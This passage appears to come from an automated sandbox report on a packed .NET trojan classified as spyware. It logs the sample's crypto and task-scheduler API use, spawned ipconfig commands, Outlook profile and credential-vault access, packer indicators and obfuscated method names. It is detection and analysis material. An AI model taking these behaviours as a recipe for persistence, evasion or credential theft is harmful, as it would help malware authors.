                  Source: xnlP06YunJ.exe, 00000004.00000002.2105430058.00000000008F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exeBinary or memory string: OriginalFilenameKqjoqlc.exe< vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: xnlP06YunJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: xnlP06YunJ.exe, ConcreteAdapter.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oH693OIIGFg.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, 1jwN8Qsp0hs.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, BOM.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, SN5.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, cpjKUanB.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, IicScPhBvUG.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/0@2/2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
                  Source: xnlP06YunJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: xnlP06YunJ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: xnlP06YunJ.exeVirustotal: Detection: 72%
                  Source: xnlP06YunJ.exeReversingLabs: Detection: 60%
                  Source: unknownProcess created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: xnlP06YunJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: xnlP06YunJ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: xnlP06YunJ.exeStatic file information: File size 1971616 > 1048576
                  Source: xnlP06YunJ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x183a00
                  Source: xnlP06YunJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, tiLJlFegcsjJY5bvKoi.cs.Net Code: Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777255)),Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777287))})
                  .NET source code contains potential unpacker
                  Source: xnlP06YunJ.exe, ConcreteAdapter.cs.Net Code: AdaptExternalAdapter System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.xnlP06YunJ.exe.5db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.xnlP06YunJ.exe.5db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 6616, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066A31B9 push esp; iretd 0_2_066A31BC
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC9FA9 push cs; ret 0_2_06BC9FAA
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC9FE1 push cs; ret 0_2_06BC9FE2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC94E9 push es; ret 0_2_06BC94EA
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCC5BE push es; ret 0_2_06BCC5C4
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC75A2 push es; retf 0_2_06BC75A8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC95F0 push es; ret 0_2_06BC95F2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC9520 push es; ret 0_2_06BC9522
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC9523 push es; ret 0_2_06BC952A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC9569 push es; ret 0_2_06BC956A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC956B push es; ret 0_2_06BC9572
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCD0BE push es; retf 0_2_06BCD0D0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCA081 push cs; ret 0_2_06BCA082
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCB882 push es; retf 0_2_06BCB888
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCA028 push cs; ret 0_2_06BCA02A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCA078 push cs; ret 0_2_06BCA07E
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCB92A push es; retf 0_2_06BCB930
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44ADB push esp; ret 0_2_06C44AE1
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C446FA pushfd ; ret 0_2_06C44AD9
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44EA8 pushad ; ret 0_2_06C44EA9
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C42A6B push ebp; ret 0_2_06C42A72
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C42A29 push esp; ret 0_2_06C42A2A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C41FC1 push ecx; ret 0_2_06C41FC2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C43FC1 pushad ; ret 0_2_06C43FC2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C41FC3 push eax; ret 0_2_06C41FC6
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C43F81 pushad ; ret 0_2_06C43F82
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44008 pushad ; ret 0_2_06C4400A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C429E1 push esp; ret 0_2_06C429E2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C429E9 push esp; ret 0_2_06C429EA
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44D43 push esp; ret 0_2_06C44D49
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C1021 push es; ret 4_2_064C1024
                  Source: xnlP06YunJ.exeStatic PE information: section name: .text entropy: 7.806883109554231
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oH693OIIGFg.csHigh entropy of concatenated method names: 'Xyaca7TjH9r8ujdrrjl', 'AwbYvITAKsFvwdxR3ud', 'XFWbm3TbDbv1GlUCDtG', 'k9HQ68TMqEn6UCm7cQJ', 'Grab', 'xMZg90LFcT', 'gsNgt5GrEX', 'bEOgncqr8p', 'LrXIETT9Q1sVUpmW4MS', 's2gCbVTtYmZes2mikyQ'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, 1RmE4.csHigh entropy of concatenated method names: 'ReleaseHandle', 'JhdrbFTfyPpsbD7X5N9', 'SciD8XTVYxfxZqTHPPP', 'RegOpenKeyEx', 'RegCloseKey', 'RegQueryValueEx', 's4myi0TWhErCShaZBrD', 'GhWeBKT3fJx2hgIHGFT', 'Grab', 'xL3b71TlAXCINK4BMf0'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.csHigh entropy of concatenated method names: 'el8cZa2Bj7WUrDfoGnH', 'WKiffG2cBprZsynkmrB', 'OIj5Ppk7iA', 'vh0ry9Sq2v', 'pFq5Y4cbyF', 'JO658oU7LE', 'GMF5QF5ASt', 'EUQ5zj6mZO', 'xyIJKwqHCk', 'bFm1nNr3T1'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oYiON3.csHigh entropy of concatenated method names: 'f4Hw9ow795', 'lNMwtlaHdP', 'jhawn3YIfC', 'ZUa', 'P5IX3BG', 'JfWDY', '_8WQtAGzX', 'qRrwjqBqdM', 'EHXwAkFitP', 'tTLwuv4onS'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, sc1GAGO7.csHigh entropy of concatenated method names: 'H6wQKiL1W1hg4vMYFpu', 'fRZEkWL5Kmfnmq5X4yX', 'iXYP', 'KxxZ9EnF', 'MgAvPqe0', 'keIjIjhkNWj', 'KM1XL1z6', 'Asy', '_1VE2K', 'OlIjOE6'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, uIOyrjgmj4VibKGvHxW.csHigh entropy of concatenated method names: 'y4bwx0eIit', 'V5UwRAWD2J', 'QW4wwCou6D', 'gN6w0Bo0Ga', 'Xaiw58nEyt', 'x1ywDDikq4', 'CdaPQOF0mu8UieWhIoL', 'vxHYSJF1svDoZC9K42h', 'A8OgkixAht', 'AHO046FR3jMSXdBXHNs'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, m3NjPDDLiSGRFVZ5Xij.csHigh entropy of concatenated method names: 'JaiDMpuvGa', 'b4ND4tcBrI', 'uH4D75vj6G', 'RebDvuQITy', 'q0yDdmFtCG', 'MOBDpT748A', 'GZZDBZ0YNZ', 'zMJDcqUA1c', 'luyDNi8aCn', 'xoRDEeuXs6'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, bOL8YNwGWNXPaSJfSjW.csHigh entropy of concatenated method names: 'qpQwiRuf4p', 'tOtwkkb3hV', 'kM8wYR4Aqb', 'Nvnw8Iava4', 'hI7wzGGWbg', 'qTM0x1c03S', 'OEq0gcxPS6', 'Upr0wJfaQ2', 'o8F01IEhJQ', 'x5505xnfwd'
                  Source: 0.2.xnlP06YunJ.exe.5980000.5.raw.unpack, JaR1TLbKvV3KQlwEEf6.csHigh entropy of concatenated method names: 'x6Vbe65AaY', 'MQAbsxC4KE', 'Tc2b0oVdXU', 'e7sbwS2Jds', 'OF3buvqJGu', 'ke6bEtuqt2', 'UPGbGeADEf', 'umxbpjYUb8', 'KkmbaWVSSG', 'iSDbZOxwm9'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, opM1EgsDhQbDcOCE5Bu.csHigh entropy of concatenated method names: 'p97stdejne', 'Vj4s8U1Xpb', 'NoksTBlhXE', 'bN9s2gDMTF', 'wSHsx9VjF8', 'OndsPhmso1', 'skRsCGLf6s', 'Clws9kYD77', 'JQmsSBcwUa', 'crNsXWpfKA'
                  Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, C4LZocsJmUFZM3f0wej.csHigh entropy of concatenated method names: 'dU2HAukkjU', 'MDVHzBWdAl', 'HGNEfjcgK7', 'aMeEbmWvLL', 'rA5EhMaKks', 'kxqEOqRm1V', 'DfRE6JNSDp', 'WeNcEHZZpD', 'xZqEiJOF5q', 'YYnEdnjglL'
